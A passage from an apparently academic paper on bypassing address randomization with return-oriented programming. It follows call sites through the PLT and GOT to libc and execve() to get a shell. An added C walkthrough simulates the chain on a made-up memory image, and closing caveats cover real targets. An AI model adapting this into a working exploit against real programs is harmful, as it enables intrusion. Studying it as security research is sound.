such would reveal the location and offset in PLT/GOT, too. This analogy can also be seen from Figure 1.
Another way to look at such an attack is that, no matter how well code and data objects are randomized, the randomized objects still need to be accessible to the original program for it to execute. Addresses of libc functions are randomized, but the randomized addresses are stored in PLT/GOT so that libc functions can be called; by the same token, PLT and GOT can be randomized, but their randomized addresses are then used as the targets of the call instructions in the program so that functions can still be called. If our attack is able to locate the call instructions and find out the targets of the calls, we can find the addresses of libc functions indirectly.
3.2 Attack Overview
To demonstrate the chain of dependencies, we design our attack to perform arbitrary computation when the binary program does not make use of position-independent code and the attacker has access to the vulnerable program for static analysis. In such a scenario, the attacker can easily locate the call instructions by disassembling the code segment. However, finding out the (randomized) target of the call still remains nontrivial, since it requires a memory read operation to be executed. Recall that 1) we assume that memory pages are non-writable or non-executable, and therefore executing injected code is not an option; 2) libc function addresses have not been found, and therefore return-to-libc is not an option either.
However, with the advances in return-oriented programming [14], such an attack becomes possible. Return-oriented programming fits the requirements of the attack well because it does not need to execute any injected code. Instead, it can make use of short instruction sequences from the original program (not from libc, since the randomized libc addresses have not been found yet) to perform
[Fig. 2 flowchart: static analysis to locate the address of a call instruction -> read the target address of the call instruction -> read the target address in PLT -> read the target address in GOT -> transfer control to execve() in libc to obtain a shell]
Fig. 2. Overview of our attack
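The following is an added worked example, not code from the paper: it follows the dependency chain of Sec. 3.2 and Fig. 2 (call instruction -> PLT stub -> GOT slot -> libc function -> execve()) over a constructed x86-64 memory image of a non-PIE program. The function mem_read() stands in for the memory-read primitive that the paper builds from ROP gadgets; the addresses, the instruction bytes and the libc offsets PUTS_OFF/EXECVE_OFF are all invented for illustration and do not describe any real binary.

```c
/* Added example, not from the paper: follows the call -> PLT -> GOT ->
 * libc dependency chain of Fig. 2 over a constructed x86-64 memory image
 * of a non-PIE program. Every address, offset and byte below is made up. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_BASE     0x400000ULL            /* typical non-PIE load address */
#define IMG_SIZE     0x5000ULL
#define CALL_SITE_VA 0x401136ULL            /* .text: call puts@plt (e8 rel32) */
#define PLT_STUB_VA  0x401030ULL            /* .plt: endbr64; bnd jmp *slot(%rip) */
#define GOT_SLOT_VA  0x404018ULL            /* .got: slot the loader fills in */
#define LIBC_PUTS_VA 0x00007f3a1c2e4e50ULL  /* constructed "randomized" puts() */
/* Hypothetical offsets within the victim's libc build (taken from the same
 * libc binary in a real attack); libc is randomized as a whole, so the
 * distance between two of its functions is fixed. */
#define PUTS_OFF     0x80e50ULL
#define EXECVE_OFF   0xe3ae0ULL

typedef struct { uint64_t base; uint8_t buf[IMG_SIZE]; } Mem;

/* The only primitive the attack needs: read n bytes at a virtual address.
 * In the paper this is built from ROP gadgets; here it is a bounds-checked
 * read from the constructed image. */
static int mem_read(const Mem *m, uint64_t va, void *out, size_t n) {
    if (va < m->base || va - m->base + n > IMG_SIZE) return 0;
    memcpy(out, m->buf + (va - m->base), n);
    return 1;
}
static int read_i32(const Mem *m, uint64_t va, int32_t *v) {   /* little-endian */
    uint8_t b[4]; if (!mem_read(m, va, b, 4)) return 0;
    uint32_t u = (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
    memcpy(v, &u, 4); return 1;
}
static int read_u64(const Mem *m, uint64_t va, uint64_t *v) {
    uint8_t b[8]; if (!mem_read(m, va, b, 8)) return 0;
    *v = 0; for (int i = 7; i >= 0; i--) *v = (*v << 8) | b[i]; return 1;
}

/* Step 2 of Fig. 2: decode "e8 rel32"; target = next instruction + rel32. */
uint64_t call_target(const Mem *m, uint64_t call_va) {
    uint8_t op; int32_t rel;
    if (!mem_read(m, call_va, &op, 1) || op != 0xE8) return 0;  /* not a direct call */
    if (!read_i32(m, call_va + 1, &rel)) return 0;
    return call_va + 5 + (int64_t)rel;
}

/* Step 3: decode the PLT stub "[f3 0f 1e fa] [f2] ff 25 disp32", i.e. an
 * optional endbr64 and bnd prefix followed by jmp *disp32(%rip); the GOT
 * slot is next instruction + disp32. */
uint64_t plt_got_slot(const Mem *m, uint64_t plt_va) {
    uint8_t b[4]; int32_t disp; uint64_t p = plt_va;
    if (mem_read(m, p, b, 4) && b[0] == 0xF3 && b[1] == 0x0F && b[2] == 0x1E && b[3] == 0xFA) p += 4;
    if (mem_read(m, p, b, 1) && b[0] == 0xF2) p += 1;
    if (!mem_read(m, p, b, 2) || b[0] != 0xFF || b[1] != 0x25) return 0;  /* not jmp *[rip+disp32] */
    if (!read_i32(m, p + 2, &disp)) return 0;
    return p + 6 + (int64_t)disp;
}

/* Steps 2-4 chained: call site -> PLT stub -> GOT slot -> libc address. */
uint64_t resolve_libc_func(const Mem *m, uint64_t call_va) {
    uint64_t plt = call_target(m, call_va), slot = 0, fn = 0;
    if (!plt || !(slot = plt_got_slot(m, plt)) || !read_u64(m, slot, &fn)) return 0;
    return fn;
}

/* Step 5: one resolved libc function gives libc's base and hence execve(). */
uint64_t execve_from(uint64_t puts_va) { return puts_va - PUTS_OFF + EXECVE_OFF; }

/* Constructed image: only the three relevant spots are filled in. */
static void put_u32(Mem *m, uint64_t va, uint32_t v) {
    for (int i = 0; i < 4; i++) m->buf[va - m->base + i] = (uint8_t)(v >> (8 * i));
}
static void build_image(Mem *m) {
    static const uint8_t stub[7] = {0xF3, 0x0F, 0x1E, 0xFA, 0xF2, 0xFF, 0x25};
    memset(m, 0, sizeof *m); m->base = IMG_BASE;
    m->buf[CALL_SITE_VA - IMG_BASE] = 0xE8;
    put_u32(m, CALL_SITE_VA + 1, (uint32_t)(PLT_STUB_VA - (CALL_SITE_VA + 5)));
    memcpy(m->buf + (PLT_STUB_VA - IMG_BASE), stub, sizeof stub);
    put_u32(m, PLT_STUB_VA + 7, (uint32_t)(GOT_SLOT_VA - (PLT_STUB_VA + 11)));
    for (int i = 0; i < 8; i++) m->buf[GOT_SLOT_VA - IMG_BASE + i] = (uint8_t)(LIBC_PUTS_VA >> (8 * i));
}
Mem *image(void) { static Mem img; static int built; if (!built) { build_image(&img); built = 1; } return &img; }

int main(void) {
    const Mem *m = image();
    uint64_t plt = call_target(m, CALL_SITE_VA), slot = plt_got_slot(m, plt);
    uint64_t fn = resolve_libc_func(m, CALL_SITE_VA);
    printf("call@%#llx -> plt@%#llx -> got@%#llx -> puts@%#llx\n",
           (unsigned long long)CALL_SITE_VA, (unsigned long long)plt,
           (unsigned long long)slot, (unsigned long long)fn);
    printf("libc base %#llx, execve() at %#llx\n",
           (unsigned long long)(fn - PUTS_OFF), (unsigned long long)execve_from(fn));
    return 0;
}
```

Two caveats a practitioner would check before relying on this chain against a real target: the PLT stub encoding varies with the toolchain (plain `jmp *disp32(%rip)`, with or without endbr64 and the bnd prefix, and a separate .plt.sec section when IBT is enabled), so the decoder above accepts the common variants but a real binary should be disassembled first; and with lazy binding the GOT slot holds the address of the resolver trampoline until the function has been called once, so the read must happen after that first call (or the binary must be linked with BIND_NOW) for the slot to contain a libc address.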